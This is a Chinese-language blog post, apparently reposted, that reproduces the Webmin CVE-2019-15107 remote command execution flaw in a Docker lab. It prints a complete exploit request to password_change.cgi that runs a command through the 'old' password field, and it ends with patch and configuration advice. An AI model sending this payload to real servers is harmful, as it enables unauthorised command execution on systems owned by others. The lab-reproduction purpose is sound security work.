Webmin 远程命令执行漏洞复现

webmin简介
Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 Webmin 让您能够在远程使用支持 HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web 界面管理您的主机。
漏洞简介
webmin是一款强大的Unix系统管理工具,在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞的威胁,而在其它版本当用户关闭密码过期策略时,受漏洞威胁的概率较小,漏洞主要是起代码中引用‘qx/ /’方法,把密码字符串当作命令执行。
利用条件
需要系统开启密码修改功能
存在此漏洞的版本
1.882-1.920
漏洞复现
复现此漏洞我们需要先知道root密码==>利用docker容器修改root密码
第一步先创建一个bash: docker exec -it  CONTAINER_ID  bash
(CONTAINER_ID可以用docker ps -a查看)
更新密码
登录
 设置为允许使用旧密码重置新密码(此版本为默认)
漏洞页面
使用bp抓包,发送到Repeater
构造EXP
命令执行成功
EXP
POST /password_change.cgi HTTP/1.1
Host: 10.10.10.142:10000
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://10.10.10.142:10000/password_change.cgi/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
cache-control: no-cache
 
 
user=rootxx&pam=&expired=2&old=ls&new1=test2&new2=test2
 
 
 
 
关于修复
升级版本,或在版本1.900到1.920中编辑/etc/webmin/miniserv.conf,删除passwd_mode =行,然后运行/ etc / webmin / restart,以免系统受到攻击。

猜你喜欢

转载自www.cnblogs.com/3geweb/p/12702841.html
今日推荐